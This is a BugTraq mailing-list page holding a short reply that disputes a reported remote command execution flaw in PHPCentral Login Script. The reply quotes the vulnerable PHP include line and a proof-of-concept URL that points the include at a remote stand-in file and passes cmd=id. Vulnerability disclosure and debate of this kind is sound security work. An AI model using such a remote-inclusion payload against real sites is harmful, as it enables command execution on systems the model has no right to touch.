BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
Re: PHPCentral Login Script Remote Command Execution Vulnerability Aug 14 2007 08:16AM
Magnus Holmgren (holmgren lysator liu se)
On Sunday 12 August 2007 17:12, rizgar (at) linuxmail (dot) org [email concealed] wrote:
> include.php ;
>
> Lines 4 ;
>
> include("".$_SERVER[DOCUMENT_ROOT]."/$folder/config.php");
>
> PoC :
>
> http://www.example.com/include.php?_SERVER[DOCUMENT_ROOT]=http://evil.tx
t?&
>cmd=id

*Of course* this does not work. Setting register...

[ more ]  
 

Privacy Statement
Copyright 2010, SecurityFocus